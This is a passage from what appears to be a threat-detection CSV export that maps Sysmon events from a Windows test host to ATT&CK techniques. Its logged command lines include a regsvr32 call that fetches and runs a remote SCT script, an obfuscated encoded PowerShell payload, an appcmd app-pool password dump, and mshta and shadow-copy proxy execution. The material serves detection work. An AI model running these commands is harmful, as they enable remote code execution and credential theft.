<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.891593Z"">
</TimeCreated>
<EventRecordID>5904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.851</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010C47BFF00</Data>
<Data Name=""ProcessId"">560</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
</TimeCreated>
<EventRecordID>6192</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
<Data Name=""FileVersion"">?</Data>
<Data Name=""Description"">?</Data>
<Data Name=""Product"">?</Data>
<Data Name=""Company"">?</Data>
<Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
</TimeCreated>
<EventRecordID>6192</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
<Data Name=""FileVersion"">?</Data>
<Data Name=""Description"">?</Data>
<Data Name=""Product"">?</Data>
<Data Name=""Company"">?</Data>
<Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( &quot;C:\Windows\system32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:51.007950Z"">
</TimeCreated>
<EventRecordID>16498</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:50.852</Data>
<Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-00105FE01700</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1</Data>
<Data Name=""ParentProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
<Data Name=""ParentProcessId"">2952</Data>
<Data Name=""ParentImage"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
